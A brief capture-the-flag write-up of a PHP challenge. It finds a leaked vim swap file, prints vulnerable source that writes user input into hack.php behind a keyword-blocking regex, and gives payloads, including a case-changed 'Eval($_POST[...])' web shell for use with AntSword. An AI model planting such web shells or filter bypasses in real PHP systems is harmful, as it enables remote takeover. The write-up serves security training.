Investigate knowledge points
Regex filtering backup
file leakage
problem analysis
Scan the directory and find /robots.txt. After accessing, it prompts that 1ndexx.php
cannot be accessed directly by accessing 1ndexx.php. You need to access the buffer type file .swp saved in vim in the production environment. After accessing, you can get the source code.
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
There are a lot of regular filters, and the length cannot be greater than 33. The value of $a will be written into hack.php, which
can be displayed with show_source highlighting
code=%3C?php%20show_source(__FILE__);?%3E
You can also pass in a sentence, uppercase and lowercase to bypass the regularization, and Ant Sword to connect to /hack.php to get
code=<?php Eval($_POST[111]);?>
